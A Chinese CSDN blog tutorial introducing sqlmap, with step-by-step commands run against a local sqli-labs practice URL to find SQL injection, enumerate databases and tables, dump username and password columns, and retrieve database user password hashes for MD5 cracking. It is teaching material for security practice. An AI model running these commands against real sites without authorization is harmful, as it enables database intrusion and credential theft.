sqlmap的使用 ---- 入门

最新推荐文章于 2024-06-18 17:07:45 发布
最新推荐文章于 2024-06-18 17:07:45 发布
阅读量3.7k 收藏 19
点赞数 5
分类专栏: sql注入 工具教程 文章标签: sqlmap基础用法
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34444097/article/details/82502783
版权

sqlmap是一个自动化的sql注入工具,其主要功能就是扫描、发现给定url的sql注入漏洞。

1. 判断是否存在注入

当url中存在两个参数时,要使用双引号

sqlmap -u +url

这里写图片描述

2. 判断文本中的请求是否存在注入
利用工具burp suite抓包,保存为文本
这里写图片描述

sqlmap -r +http请求文本

这里写图片描述
3. 查询当前用户下的所有数据库

sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --dbs
这里写图片描述
4. 获取数据库中的表名

sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security --tables
这里写图片描述
5. 获取表中的字段名

sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security -T users --columns
这里写图片描述
6. 获取字段内容

sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security -T users -C username,password --dump
这里写图片描述
7. 获取数据库中的所有用户

sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --users
这里写图片描述
8. 获取数据库用户的密码

sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --passwords
查询到的密码时MD5值,在MD5解密网站即可得到明文密码
这里写图片描述
9. 获取当前网站数据库的名称

sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --current-db
这里写图片描述
10. 获取当前数据库的用户名称

sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --current-user
这里写图片描述

wkend
关注
  • 5
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlmap使用方法
08-26
sqlmap -p 指定测试参数 -b 获取banner --dbs 列举数据库 --is-dba 是否是管理员权限 --current-db 当前数据库 --current-user 当前用户 --tables 列举数据库的表名 --count 检索所有条目数 --columns 获取表的列名 --dump 获取表中的数据,包含列 --dump-all 转存DBMS数据库所有表项目 --level 测试等级(1-5),默认为1 -v 显示详细信息 读取数据库--->读取表---->读取表的列---->获取内容
sqlmap手册-中文版.pdf
07-30
sqlmap
sqlmap使用教程
sworddancing is the best one
10-21 6839
#sqlmap使用教程 作者:刘行 李江涛     毫无疑问地说,sqlmap是一款功能十分强大的sql注入工具,这篇文章我们就来学习一下sqlmap的一些基本的使用。     接下来我们就以南邮上一道简单的宽字节注入题来学习sql
安全测试必备工具——SQLMap 安装及基本应用
qq_73332379的博客
06-18 405
SQLmap是一款由python开发的用来检测与利用SQL注入漏洞的免费开源工具。支持多种数据库,如MySQL、Oracle、PostgreSQL、SQL Server、Access、IBMDB2、SQLite等数据库。有一个非常棒的特性,即对检测与利用的自动化处理(如数据库指纹、访问底层文件系统、执行命令)。此文中提到的工具及技术操作,仅用于学术交流,请遵守《网络安全法》,严禁将此文中工具和技术用于非法攻击测试。
sqlmap简单使用
selecthch的博客
06-02 2321
今天学习了sqlmap使用,自己又在网上查找了一些学习笔记然后就想在本地搭建的环境上测试使用一下sqlmap简介sqlmap支持五种不同的注入模式:1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返...
sqlmap的应用实战
vala0901的博客
05-10 7211
小白一枚,在大神的各种帖子帮助下刚学会用sqlmap,写下过程一起分享
SQLmap使用教程图文教程(非常详细)从零基础入门到精通,看完这一篇就够了。
A_991128a的博客
09-07 1832
SQLmap是一款「自动化」SQL注入工具,kali自带。路径 /usr/share/sqlmap打开终端,输入sqlmap,出现以下界面,就说明SQLmap「可用」。1、检测「注入点」2、查看所有「数据库」3、查看当前使用的数据库4、查看「数据表」5、查看「字段」6、查看「数据」
SqlMap入门指南-思维导图.png
04-25
SqlMap入门指南.png
ibatis-sqlMap-入门教程(代码)
10-22
【标题】"ibatis-sqlMap-入门教程(代码)" 涉及的知识点主要集中在使用MyBatis(原iBATIS)框架进行数据库操作的初步实践上。MyBatis是一个优秀的持久层框架,它支持定制化SQL、存储过程以及高级映射,避免了几乎...
sqlmap-wiki-zhcn::syringe:可能是最完整的sqlmap中文文档
02-04
- **开始使用**:引导新手快速入门,包括基本命令和概念。 - **高级特性**:详细解释各种高级选项和技术,如多线程、代理设置、自定义脚本等。 - **插件和模块**:介绍SQLMap的插件系统,以及如何扩展其功能。 - **...
CTF题目 [成绩查询 - Bugku CTF]union注入和sqlmap入门使用,两种方法一道题
最新发布
07-16
### CTF题目 [成绩查询 - Bugku CTF]union注入和sqlmap入门使用 #### 知识点一:SQL注入基础与Union注入原理 **SQL注入**是一种常见的网络安全攻击方式,通过将恶意SQL代码插入应用程序接收的数据中,进而操纵...
SqlMap使用
06-24
本文档详细介绍了SqlMap使用教程,SQL注入攻击是黑客对数据库进行攻击的常用手段之一
sqlmap基本使用方式(非常详细)零基础入门到精通,收藏这一篇就够了
Javachichi的博客
03-13 2599
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。会清空之前的session,重新测试该目标。
sqlmap在cmd中打开方法
weixin_63082823的博客
12-06 808
python sqlmap.py -h
sqlmap功能梳理
Starr
03-13 2327
文章目录1. Target连接数据库加载文件2. Requestcookiehost、UA等其它http头部认证代理延迟、超时与重置随机参数安全模式忽略其它3. Optimization4. Injection指定DBMS指定系统sqlmap机制开关无效替换指定payload前后缀设置tamper绕过waf脚本5. Detection探测levelrisk页面比较6. sqli techniqueDNS攻击!!!二次注入7. 指纹8. Enumeration检索信息经典套路其它(部分):9. Brute
Sqlmap基本使用
Lvjianping2的博客
06-14 604
user-agent=AGENT 默认情况下sqlmap的HTTP请求头中User-Agent是:sqlmap/1.0-dev-xxxxxxx(http://sqlmap.org)可以使用–user-agent参数来修改,同时也可以使用–random-agent参数来随机的从./txt/user-agents.txt中获取。–count 检索表的项目数,有时候用户只想获取表中的数据个数而不是具体的内容,那么就可以使用这个参数:sqlmap.py -u url –count -D testdb。
SQLmap使用总结
Alexz__的博客
02-15 3716
1.简介 2.说明书翻译 3. 基础命令汇总 4.基础命令尝试 5.高级用法sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQLServer、IBM DB2、SQLite、Firebird、Sybase和...
SQLMAP基本应用详解(实战演示)
刘桂香263的博客
07-31 4742
SQLMAP自动化注入工具具有扫描、发现并利用给定的URL的SQL漏洞。
SQLMap使用|命令大全(干货)
热门推荐
qq_45719090的博客
02-27 1万+
适合新手的sqlmap使用教程,附带sqlmap命令
sqlmap -dump
08-24
- *1* *2* [史上最详细sqlmap入门教程](https://blog.csdn.net/weixin_44867191/article/details/130702472)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值